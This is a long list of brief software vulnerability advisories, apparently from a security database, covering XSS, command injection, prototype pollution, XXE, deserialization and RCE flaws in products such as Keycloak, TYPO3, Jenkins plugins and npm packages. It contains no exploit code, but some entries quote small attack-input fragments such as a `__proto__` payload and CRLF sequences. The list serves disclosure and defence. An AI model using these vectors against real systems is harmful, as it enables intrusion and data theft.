In TYPO3 CMS, it has been discovered that the backend user interface and install tool are vulnerable to a same-site request forgery. A backend user can be tricked into interacting with a malicious resource an attacker previously managed to upload to the web server. Scripts are then executed with the privileges of the victims' user session. In a worst-case scenario, new admin users can be created which can directly be …
H2, as used in Datomic and other products, allows remote code execution because CREATE ALIAS can execute arbitrary Java code.
TensorFlow before 1.7.0 has an integer overflow that causes an out-of-bounds read, possibly causing disclosure of the contents of process memory. This occurs in the DecodeBmp feature of the BMP decoder in core/kernels/decode_bmp_op.cc.
In TYPO3 CMS 10.4.0 through 10.4.1, it has been discovered that time-based attacks can be used with the password reset functionality for backend users. This allows an attacker to mount user enumeration based on email addresses assigned to backend user accounts. This has been fixed in 10.4.2.
When using the spring-security-saml2-service-provider component, a malicious user can carefully modify an otherwise valid SAML response and append an arbitrary assertion that Spring Security will accept as valid.
All versions before 1.6.7 of org.jooby:jooby are vulnerable to Directory Traversal via two separate vectors.
A flaw was found in Keycloak, where the code base contains usages of ObjectInputStream without type checks. This flaw allows an attacker to inject arbitrarily serialized Java Objects, which would then get deserialized in a privileged context and potentially lead to remote code execution.
It has been discovered that HTML placeholder attributes containing data of other database records are vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability.
The SVG Sanitizer extension for TYPO3 has a cross-site scripting vulnerability. Slightly invalid or incomplete SVG markup is not correctly processed and thus not sanitized at all. Invalid markup is still evaluated in browsers and may lead to cross-site scripting.
It has been discovered that link tags generated by the typolink functionality are vulnerable to cross-site scripting; properties being assigned as HTML attributes have not been parsed correctly.
There is a vulnerability in actionpack_page-caching that allows an attacker to write arbitrary files to a web server, potentially resulting in remote code execution if the attacker can write unescaped ERB to a view.
SLPJS has a vulnerability where users could experience false-negative validation outcomes for MINT transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton.
In SLP Validate, users could experience false-negative validation outcomes for MINT transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton.
A flaw was found in the reset credential flow which allows an attacker to gain unauthorized access to the application.
A flaw in the reset credential flow in keycloak allows an attacker to gain unauthorized access to the application.
Jooby is vulnerable to a Directory Traversal via two separate vectors.
A flaw was found in Keycloak which allows a malicious user that is currently logged in, to see the personal information of a previously logged-out user in the account manager section.
A flaw in Keycloak allows a malicious user that is currently logged in, to see the personal information of a previously logged-out user in the account manager section.
A flaw was found in Keycloak. This flaw allows a malicious user that is currently logged-in, to see the personal information of a previously logged-out user in the account manager section.
In the SEOmatic plugin for Craft CMS, helpers/DynamicMeta.php does not properly sanitize the URL. This leads to Server-Side Template Injection and credentials disclosure via a crafted Twig template after a semicolon.
A flaw was found in keycloak. A logged exception in the HttpMethod class may leak the password given as parameter.
A logged exception in the HttpMethod class may leak the password given as parameter. The highest threat from this vulnerability is to data confidentiality.
A flaw was found in keycloak. A logged exception in the HttpMethod class may leak the password given as parameter. The highest threat from this vulnerability is to data confidentiality.
Apache log4net does not disable XML external entities when parsing log4net configuration files. This could allow for XXE-based attacks in applications that accept arbitrary configuration files from users.
Apache log4net does not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files.
tinymce 4.7.11, 4.7.12 is affected by: CWE-79: Improper Neutralization of Input During Web Page Generation. The impact is: JavaScript code execution. The component is: Media element. The attack vector is: The victim must paste malicious content to media element's embed tab.
A flaw was found in Ansible when using modules that decrypt vault files. The temporary directory is created in /tmp and left unencrypted.
json-c has an integer overflow and out-of-bounds write via a large JSON file, as demonstrated by printbuf_memappend.
After a certificate error was overridden by the user, qutebrowser displays the URL as yellow (colors.statusbar.url.warn.fg). However, when the affected website was subsequently loaded again, the URL was mistakenly displayed as green (colors.statusbar.url.success_https). While the user already has seen a certificate error prompt at this point (or set content.ssl_strict to false which is not recommended), this could still provide a false sense of security.
Possible XXE during an EventPublisher update.
A flaw was found in Keycloak’s user-managed access interface, where it would permit a script to be set in the UMA policy. This flaw allows an authenticated attacker with UMA permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the user running the application.
A flaw was found in the Keycloak admin console, where the realm management interface permits a script to be set via the policy. This flaw allows an attacker with authenticated user and realm management permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the application user.
In Sprout Forms before 3.9.0, there is a potential Server-Side Template Injection vulnerability when using custom fields in Notification Emails which could lead to the execution of Twig code. This has been fixed in 3.9.0.
This advisory has been marked as False-Positive and removed.
In Shopizer, a script can be injected in various forms and saved in the database, then executed when information is fetched from the backend.
A potential timing attack exists on pages or documents that have been protected with a shared password through Wagtail's "Privacy" controls. This password check is performed through a character-by-character string comparison, and so an attacker who is able to measure the time taken by this check to a high degree of accuracy could potentially use timing differences to gain knowledge of the password. (This is understood to be feasible on …
curlrequest allows reading any file by populating the file parameter with user input.
In Sorcery, there is a brute force vulnerability when using password authentication via Sorcery. The brute force protection submodule will prevent a brute force attack for the defined lockout period, but once expired, protection will not be re-enabled until a user or malicious actor logs in successfully. This does not affect users that do not use the built-in brute force protection submodule, nor users that use permanent account lockout.
In BookStack greater than or equal to 0.18.0 and less than 0.29.2, there is an XSS vulnerability in comment creation. A user with permission to create comments could POST HTML directly to the system to be saved in a comment, which would then be executed/displayed to other users viewing the comment. Through this vulnerability custom JavaScript code could be injected and therefore run on other user machines. This most impacts …
In Java-WebSocket there is an Improper Validation of Certificate with Host Mismatch where WebSocketClient does not perform SSL hostname validation.
Jenkins Copy Artifact Plugin performs improper permission checks, allowing attackers to copy artifacts from jobs they have no permission to access.
A missing permission check in Jenkins Amazon EC2 Plugin form-related methods allows users with Overall/Read access to enumerate credential IDs of the credentials stored in Jenkins.
core/get_menudiv.php in Dolibarr allows remote authenticated attackers to bypass intended access restrictions via a non-alphanumeric menu parameter.
PySAML2 before 5.0.0 does not check that the signature in a SAML document is enveloped and thus signature wrapping is effective, i.e., it is affected by XML Signature Wrapping (XSW). The signature information and the node/object that is signed can be in different places and thus the signature verification will succeed, but the wrong data will be used. This specifically affects the verification of assertions that have been signed.
Jenkins Amazon EC2 Plugin unconditionally accepts self-signed certificates and does not perform hostname validation, enabling man-in-the-middle attacks.
A cross-site request forgery vulnerability in Jenkins CVS Plugin allows attackers to create and manipulate tags, and to connect to an attacker-specified URL.
A cross-site request forgery vulnerability in Jenkins Amazon EC2 Plugin allows attackers to provision instances.
Jenkins Amazon EC2 Plugin does not validate SSH host keys when connecting agents, enabling man-in-the-middle attacks.
macaron before has an open redirect in the static handler.
TensorFlow has an integer overflow that causes an out-of-bounds read, possibly causing disclosure of the contents of process memory. This occurs in the DecodeBmp feature of the BMP decoder in core/kernels/decode_bmp_op.cc.
Attackers could inject arbitrary JEXL expressions, leading to Remote Code Execution.
Doorkeeper contains an information disclosure vulnerability that allows an attacker to retrieve the client secret only intended for the OAuth application owner. After authorizing the application and allowing access, the attacker simply needs to request the list of their authorized applications in a JSON format (usually GET /oauth/authorized_applications.json). An application is vulnerable if the authorized application controller is enabled.
A flaw was found in Keycloak where a malicious user registers as oneself. The attacker could then use the remove devices form to post different credential IDs and possibly remove MFA devices for other users.
An attacker could use the 'remove devices form' to post different credential IDs and possibly remove MFA devices for other users.
An issue was discovered in service-api. It allows XXE, with resultant secrets disclosure and SSRF, via JUnit XML launch import.
Lack of authorization controls in REST API functions in TeamPass allows any TeamPass user with a valid API token to become a TeamPass administrator and read or modify all passwords via authenticated api/index.php REST API calls.
It was found that the Apache Syncope EndUser UI login page reflects the successMessage parameters. By this means, a user accessing the Enduser UI could execute JavaScript code from the URL query string.
A Server-Side Template Injection in Apache Syncope enables attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template being passed, they will be able …
All versions of chrome-launcher allow execution of arbitrary commands, by controlling the $HOME environment variable in Linux operating systems.
An archive traversal flaw was found in all ansible-engine, when running ansible-galaxy collection install. When extracting a collection .tar.gz file, the directory is created without sanitizing the filename. An attacker could take advantage of this to overwrite any file within the system.
Subrion CMS allows session fixation via an alphanumeric value in a session cookie.
Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.
Passing HTML containing <option> elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.
TeamPass allows any authenticated TeamPass user to trigger a PHP file include vulnerability via a crafted HTTP request.
TeamPass allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.
The REST API functions in TeamPass allow any user with a valid API token to bypass IP address allowlist restrictions via an X-Forwarded-For client HTTP header to the getIp function.
Actions Http-Client can disclose Authorization headers to an incorrect domain in certain redirect scenarios. This happens if consumers of the http-client make an HTTP request with an authorization header, that request leads to a redirect (302), and the redirect URL points to another domain or hostname. Consequently, the authorization header will get passed to the other domain.
In Rundeck, authenticated users can craft a request that reveals Execution data and logs and Job details that they are not authorized to see. Depending on the configuration and the way that Rundeck is used, this could result in anything between a high severity risk, or a very low risk. If access is tightly restricted and all users on the system have access to all projects, this is not really …
Subrion CMS allows CSV injection via a phrase value within a language.
Faye is vulnerable to an authentication bypass in the extension system. The vulnerability allows any client to bypass checks put in place by server-side extensions, by appending extra segments to the message channel.
admin/blocks.php in Subrion CMS through allows PHP Object Injection (with resultant file deletion) via serialized data in the subpages value within a block to blocks/edit.
In jQuery, passing HTML from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e., .html(), .append(), and others) may execute untrusted code.
In jQuery, passing HTML containing <option> elements from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e., .html(), .append(), and others) may execute untrusted code.
In Rundeck before version 3.2.6, authenticated users can craft a request that reveals Execution data and logs and Job details that they are not authorized to see. Depending on the configuration and the way that Rundeck is used, this could result in anything between a high severity risk, or a very low risk. If access is tightly restricted and all users on the system have access to all projects, this …
fun-map is vulnerable to Prototype Pollution. The function assocInM could be tricked into adding or modifying properties of 'Object.prototype' using a proto payload.
If the NiFi Registry uses an authentication mechanism other than PKI, the NiFi Registry would invalidate the authentication token on the client side but not on the server side during user logout. This permits the user's client-side token to be used after logging out to make API requests to NiFi Registry potentially hours after the user clicked logout.
A file inclusion vulnerability was found in the AJP connector enabled with a default AJP configuration port of in Undertow. A remote, unauthenticated attacker could exploit this vulnerability to read web application files from a vulnerable server. In instances where the vulnerable server allows file uploads, an attacker could upload malicious JavaServer Pages (JSP) code within a variety of file types and trigger this vulnerability to gain remote code execution.
The JSON gem has an Unsafe Object Creation Vulnerability. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.
This advisory has been marked as a false positive.
pixl-class allows execution of arbitrary commands. The members argument of the create function can be controlled by users without any sanitization.
A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops.
node-rules including allows injection of arbitrary commands. The argument rules of function fromJSON() can be controlled by users without any sanitization.
An issue was discovered in libgit2, which is used by pygit2 package: checkout.c mishandles equivalent filenames that exist because of NTFS short names.
An issue was discovered in libgit2. path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams.
An issue was discovered in libgit2: checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository.
An issue was discovered in libgit2, which is used by pygit2 package: path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository.
An issue was discovered in libgit2, which is used by rugged gem: path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository.
An issue was discovered in libgit2, which is used by rugged gem: checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository.
When starting IoTDB, the JMX port is exposed with no certification. Then, clients could execute code remotely.
Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.
OpenDMARC, when used with pypolicyd-spf, allows attacks that bypass SPF and DMARC authentication in situations where the HELO field is inconsistent with the MAIL FROM field.
decompress for Node.js is vulnerable to Arbitrary File Write via ../ in an archive member, when a symlink is used, because of Directory Traversal.
Croogo allows XSS via the title to admin/menus/menus or admin/taxonomy/vocabularies.
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.
MinIO has an authentication bypass issue in the MinIO admin API. Given an admin access key, it is possible to perform admin API operations, i.e., creating new service accounts for existing access keys without knowing the admin secret key.
Anch allows admins to cause XSS via crafted post content.
The PayPal function in paypal-adaptive could be tricked into adding or modifying properties of Object.prototype using a proto payload.
python-markdown2 through 2.3.8 allows XSS because element names are mishandled unless a \w+ match succeeds. For example, an attack might use elementname@ or elementname- with an onclick attribute.
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of OPC Foundation UA .NET Standard. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of sessions. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to create a denial-of-service condition against the application.
In Shopizer before version 2.11.0, when using the API- or Controller-based versions, a negative quantity is not adequately validated, creating an incorrect shopping cart and order total. This vulnerability makes it possible to create a negative total in the shopping cart. This has been patched in version 2.11.0.
lazysizes allows execution of malicious JavaScript. The following attributes are not sanitized by the video-embed plugin: data-vimeo, data-vimeoparams, data-youtube and data-ytparams.
jQuery allows XSS via a crafted onerror attribute of an IMG element.
re2c has a heap-based buffer overflow in Scanner::fill in parse/scanner.cc via a long lexeme.
Server or client applications that call the SSL_check_chain() function during or after a TLS handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the signature_algorithms_cert TLS extension.
SimpleSAMLphp contains an information disclosure vulnerability. The module controller in SimpleSAML\Module that processes requests for pages hosted by modules has code to identify paths ending with .php and process those as PHP code. If no other suitable way of handling the given path exists, it presents the file to the browser. The check to identify paths ending with .php does not account for uppercase letters. If someone requests a path …
A flaw was found in undertow, where the Servlet container normalizes servletPath incorrectly by truncating the path after a semicolon, which may lead to an incorrect application mapping and result in a security bypass.
In Saml2 Authentication Services for ASP.NET, and between, there is a vulnerability in how tokens are validated in some cases. Saml2 tokens are usually used as bearer tokens - a caller that presents a token is assumed to be the subject of the token. There is also support in the Saml2 protocol for issuing tokens that are tied to a subject through other means, e.g. holder-of-key where possession of a …
Various forms of SQL injection have been found, for MySQL and when filtering or doing mass-updates on char/text fields. SQLite & PostgreSQL were only affected when filtering with contains, starts_with or ends_with filters (and their case-insensitive counterparts).
svg2png allows XSS with resultant SSRF via JavaScript inside an SVG document.
lix allows man-in-the-middle attackers to execute arbitrary code by modifying the HTTP client-server data stream so that the Location header is associated with attacker-controlled executable content in the postDownload field.
Versions of https-proxy-agent prior to 2.2.3 are vulnerable to Machine-In-The-Middle. The package fails to enforce TLS on the socket if the proxy server responds to the request with an HTTP status different than 200. This allows an attacker with access to the proxy server to intercept unencrypted communications, which may include sensitive information such as credentials. Recommendation: Upgrade to version 3.0.0 or 2.2.3.
Jenkins Parasoft Findings Plugin does not configure its XML parser to prevent XML external entity (XXE) attacks.
In Shopizer, when using the API- or Controller-based versions, a negative quantity is not adequately validated, creating an incorrect shopping cart and order total. This vulnerability makes it possible to create a negative total in the shopping cart.
Jenkins Yaml Axis Plugin does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.
In Dolibarr, if USER_LOGIN_FAILED is active, there is a stored XSS vulnerability on the admin tools audit page. This may lead to stealing of the admin account.
In Dolibarr, forms are protected with a CSRF token against CSRF attacks. The problem is any CSRF token in any user's session can be used in another user's session. CSRF tokens should not be valid in this situation.
Jenkins Copr Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.
A flaw was found in all versions of the Keycloak operator before version 8.0.2 (community only), where the operator generates a random admin password when installing Keycloak; however, the password remains the same when deployed to the same OpenShift namespace.
In SilverStripe, files uploaded via Forms to folders migrated from Silverstripe may be put to the default /Uploads folder instead.
Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DoS) of MySQL Connectors.
Istio has a data-leak issue. If there is a TCP connection (negotiated with SNI over HTTPS) to *.example.com, a request for a domain concurrently configured explicitly (e.g., abc.example.com) is sent to the server(s) listening behind *.example.com. The outcome should instead be Misdirected Request. Imagine a shared caching forward proxy re-using an HTTP/2 connection for a large subnet with many users.
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based).
It was found in all keycloak versions before 9.0.0 that links to external applications (Application Links) in the admin console are not validated properly and could allow Stored XSS attacks. An authenticated malicious user could create URLs to trick users in other realms, and possibly conduct further attacks.
It was found that keycloak before version 8.0.0 exposes internal adapter endpoints in org.keycloak.constants.AdapterConstants, which can be invoked via a specially-crafted URL. This vulnerability could allow an attacker to access unauthorized information.
Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Connectors, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data as well as unauthorized read access …
Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data as well as unauthorized read access to a subset of MySQL Connectors accessible data and unauthorized ability to cause a …
The WindowsHello library has a vulnerability where encrypted data could potentially be decrypted without needing authentication. If the library is used to encrypt text and write the output to a txt file, another executable could decrypt the text using the static method NCryptDecrypt from this same library without the need to use Windows Hello Authentication again.
A cross-site scripting (XSS) vulnerability exists on the page revision comparison view within the Wagtail admin interface. A user with a limited-permission editor account for the Wagtail admin could potentially craft a page revision history that, when viewed by a user with higher privileges, could perform actions with that user's credentials. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin.
An issue was discovered in OpenEXR. There is an out-of-bounds read and write in DwaCompressor::uncompress in ImfDwaCompressor.cpp when handling the UNKNOWN compression case.
There is a std::vector out-of-bounds read and write, as demonstrated by ImfTileOffsets.cpp.
There is an out-of-bounds write in copyIntoFrameBuffer in ImfMisc.cpp.
There is an out-of-bounds read in ImfOptimizedPixelReading.h.
There is an out-of-bounds read during RLE uncompression in rleUncompress in ImfRle.cpp.
There is an out-of-bounds read during Huffman uncompression, as demonstrated by FastHufDecoder::refill in ImfFastHuf.cpp.
There is an off-by-one error in use of the ImfXdr.h read function by DwaCompressor::Classifier::Classifier, leading to an out-of-bounds read.
Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer.
devcert-sanscache allows remote attackers to execute arbitrary code or cause a Command Injection via the exec function. The variable commonName controlled by user input is used as part of the exec function without any sanitization.
Sonatype Nexus Repository before 3.21.2 allows XSS.
Sonatype Nexus Repository before 3.21.2 allows Remote Code Execution.
Oasis has a potential DNS rebinding or CSRF vulnerability. If you're running a vulnerable application on your computer and an attacker can trick you into visiting a malicious website, they could use DNS rebinding and CSRF attacks.
wolfSSL has mulmod code in wc_ecc_mulmod_ex in ecc.c that does not properly resist timing side-channel attacks.
cpp-httplib does not filter \r\n in parameters passed into the set_redirect and set_header functions, which creates possibilities for CRLF injection and HTTP response splitting in some specific contexts.
dropwizard-validation before versions 2.0.3 and 1.3.21 has a remote code execution vulnerability. A server-side template injection was identified in the self-validating feature enabling attackers to inject arbitrary Java EL expressions, leading to Remote Code Execution (RCE) vulnerability. If you are using a self-validating bean an upgrade to Dropwizard 1.3.21/2.0.3 or later is strongly recommended. The changes introduced in Dropwizard 1.3.19 and 2.0.2 for CVE-2020-5245 unfortunately did not fix the underlying …
In the case of an (authentication) error, the error object returned by the library contains the original request of the user, which may include the plaintext password the user entered. If the error object is exposed or logged without modification, the application risks password exposure.
The ZlibDecoders in Netty allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder.
npm-programmatic is vulnerable to Command Injection. The packages and option properties are concatenated together without any validation and are used by the exec function directly.
fsa is vulnerable to Command Injection. The first argument of execGitCommand(), located within lib/rep.js can be controlled by users without any sanitization to inject arbitrary commands.
clamscan is vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the _is_clamav_binary function located within Index.js.
Jenkins Code Coverage API Plugin does not configure its XML parser to prevent XML external entity (XXE) attacks.
This advisory has been marked as a false positive.
The ZlibDecoders in Netty contains an unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder.
sds is vulnerable to Prototype Pollution. The library could be tricked into adding or modifying properties of the Object.prototype by abusing the set function located in js/set.js.
express-mock-middleware is vulnerable to Prototype Pollution. Exported functions by the package can be tricked into adding or modifying properties of the Object.prototype. Exploitation of this vulnerability requires creation of a new directory where an attack code can be placed which will then be exported by express-mock-middleware.
Jenkins AWSEB Deployment Plugin does not escape various values printed as part of form validation output, resulting in a reflected cross-site scripting vulnerability.
Jenkins FitNesse Plugin does not correctly escape report contents before showing them on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users who are able to control the XML input files processed by the plugin.
Jenkins Gatling Plugin prevents Content-Security-Policy headers from being set for Gatling reports served by the plugin, resulting in an XSS vulnerability exploitable by users able to change report content.
Multiple form validation endpoints in Jenkins Mango Runner Plugin do not escape values received from the useMango service, resulting in a cross-site scripting (XSS) vulnerability exploitable by users who are able to control the values returned from the useMango service.
There is an information disclosure issue in DNN (formerly DotNetNuke) within the built-in Activity-Feed/Messaging/Userid/ Message Center module. A registered user is able to enumerate any file in the Admin File Manager (other than ones contained in a secure folder) by sending themselves a message with the file attached, e.g., by using an arbitrary small integer value in the fileIds parameter.
apiconnect-cli-plugins is vulnerable to Command Injection. It allows execution of arbitrary commands via the pluginUri argument.
compass-compile is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.
diskusage-ng is vulnerable to Command Injection. It allows execution of arbitrary commands via the path argument.
adb-driver is vulnerable to Command Injection. It allows execution of arbitrary commands via the command function.
heroku-addonpool is vulnerable to Command Injection.
node-mpv is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.
Jooby is vulnerable to HTTP Response Splitting if DefaultHttpHeaders is set to false.
All versions of Jooby are vulnerable to HTTP Response Splitting if DefaultHttpHeaders is set to false.
A vulnerability was found in all versions of Keycloak where the pages on the Admin Console area of the application are completely missing general HTTP security headers in HTTP-responses. This does not directly lead to a security issue, yet it might aid attackers in their efforts to exploit other problems. The flaws unnecessarily make the servers more prone to Clickjacking, channel downgrade attacks and other similar client-based attack vectors.
A vulnerability was found in Keycloak where the pages on the Admin Console area of the application are completely missing general HTTP security headers in HTTP-responses. This does not directly lead to a security issue, yet it might aid attackers in their efforts to exploit other problems. The flaws unnecessarily make the servers more prone to Clickjacking, channel downgrade attacks and other similar client-based attack vectors.
An attacker could alter the configuration concerning Pollers in Apache Centreon so that it is possible to run arbitrary code with root privileges.
confinit is vulnerable to Prototype Pollution. The setDeepProperty function could be tricked into adding or modifying properties of Object.prototype using a `__proto__` payload.
class-transformer is vulnerable to Prototype Pollution. The classToPlainFromExist function could be tricked into adding or modifying properties of Object.prototype using a `__proto__` payload.
dot is vulnerable to Prototype Pollution. The function set could be tricked into adding or modifying properties of Object.prototype using a `__proto__` payload.
Affected versions of acorn are vulnerable to Regular Expression Denial of Service. A regex in the form of /[x-\ud800]/u causes the parser to enter an infinite loop. The string is not valid UTF-16, which usually results in it being sanitized before reaching the parser. If an application processes untrusted input and passes it directly to acorn, attackers may leverage the vulnerability, leading to Denial of Service.
This affects the package io.jooby:jooby-netty before 1.6.9, from 2.0.0 and before 2.2.1. DefaultHttpHeaders is set to false, which means it does not validate that the header isn't being abused for HTTP Response Splitting.
An input validation flaw in npm package utils-extend may allow prototype pollution attacks resulting in remote code execution or denial of service.
op-browser is vulnerable to Command Injection. It allows execution of arbitrary commands via the url function.
install-package is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.
node-key-sender is vulnerable to Command Injection. It allows execution of arbitrary commands via the arrParams argument in the execute() function.
git-add-remote is vulnerable to Command Injection. It allows execution of arbitrary commands via the name argument.
jscover is vulnerable to Command Injection. It allows execution of arbitrary commands via the source argument.
umount is vulnerable to Command Injection. The argument device can be controlled by users without any sanitization.
get-git-data is vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the arguments provided to get-git-data.
karma-mojo is vulnerable to Command Injection. It allows execution of arbitrary commands via the config argument.
pomelo-monitor is vulnerable to Command Injection. It allows injection of arbitrary commands.
install-package is vulnerable to Command Injection. It allows execution of arbitrary commands via the device function.
effect is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.
ini-parser is vulnerable to Prototype Pollution. The library could be tricked into adding or modifying properties of Object.prototype using a `__proto__` payload.
There is a DoS vulnerability in Pillow before 6.2.2 caused by FpxImagePlugin.py calling the range function on an unvalidated 32-bit integer if the number of bands is large. On Windows running 32-bit Python, this results in an OverflowError or MemoryError due to the 2 GB limit. However, on Linux running 64-bit Python this results in the process being terminated by the OOM killer.
libImaging/FliDecode.c in Pillow before 6.2.2 has an FLI buffer overflow.
Versions of ecstatic prior to 4.1.2, 3.3.2 or 2.2.2 are vulnerable to Open Redirect. The package fails to validate redirects, allowing attackers to craft requests that result in an HTTP 301 redirect to any other domains. Recommendation: If using ecstatic 4.x, upgrade to 4.1.2 or later. If using ecstatic 3.x, upgrade to 3.3.2 or later. If using ecstatic 2.x, upgrade to 2.2.2 or later.
When LDAP authentication is enabled in Apache Druid, callers of Druid APIs with a valid set of LDAP credentials can bypass the credentialsValidator.userSearch filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid.
Apache CXF has the ability to integrate with JMX by registering an InstrumentationManager extension with the CXF bus. If the 'createMBServerConnectorFactory' property of the default InstrumentationManagerImpl is not disabled, then it is vulnerable to a man-in-the-middle (MITM) style attack. An attacker on the same host can connect to the registry and rebind the entry to another server, thus acting as a proxy to the original. They are then able to …
Apache CXF has the ability to integrate with JMX by registering an InstrumentationManager extension with the CXF bus. If the createMBServerConnectorFactory property of the default InstrumentationManagerImpl is not disabled, then it is vulnerable to a man-in-the-middle (MITM) style attack.
mocha is vulnerable to ReDoS.
A flaw was found in all python-ecdsa versions before 0.13.3, where it did not correctly verify whether signatures used DER encoding. Without this verification, a malformed signature could be accepted, making the signature malleable. Without proper verification, an attacker could use a malleable signature to create false transactions.
There is a vulnerability in knockout, where after escaping the context of the web application, the web application delivers data to its users along with other trusted dynamic content, without validating it.
The fileview package v0.1.6 has inadequate output encoding and escaping, which leads to a stored Cross-Site Scripting (XSS) vulnerability in files it serves.
The seefl package v0.1.1 is vulnerable to a stored Cross-Site Scripting (XSS) vulnerability via a malicious filename rendered in a directory listing.
The OpenID Connect reference implementation for MITREid Connect through 1.3.3 allows XSS due to userInfoJson being included in the page unsanitized. This is related to header.tag. The issue can be exploited to execute arbitrary JavaScript.
Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider instance of Apache Dubbo.
Scripts in Sling CMS do not properly escape the Sling Selector from URLs when generating navigational elements for the administrative consoles and are vulnerable to reflected XSS attacks.
phpMyAdmin allows CRLF injection, as demonstrated by %0D%0Astring%0D%0A inputs to login form fields causing CRLF sequences to be reflected on an error page.
In Twisted Web before 20.3.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request.
A vulnerability was found in Moodle: OAuth 2 providers who do not verify users' email address changes require additional verification during sign-up to reduce the risk of account compromise.
In Twisted Web through 20.3.0, there was an HTTP request splitting vulnerability. When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted as a pipelined request.
FasterXML jackson-databind mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.*.
FasterXML jackson-databind mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider.
Incorrect parsing of certain JSON input may result in js-bson not correctly serializing BSON. This may cause unexpected application behaviour including data disclosure.
odata4j suffers from a SQL injection vulnerability in ExecuteCountQueryCommand.java.
odata4j suffers from a SQL injection flaw in ExecuteJPQLQueryCommand.java.
An issue was discovered in USC iLab cereal. It employs caching of std::shared_ptr values, using the raw pointer address as a unique identifier. This becomes problematic if a std::shared_ptr variable goes out of scope and is freed, and a new std::shared_ptr is allocated at the same address. Serialization fidelity thereby becomes dependent upon memory layout. In short, serialized std::shared_ptr variables cannot always be expected to serialize back into their original …
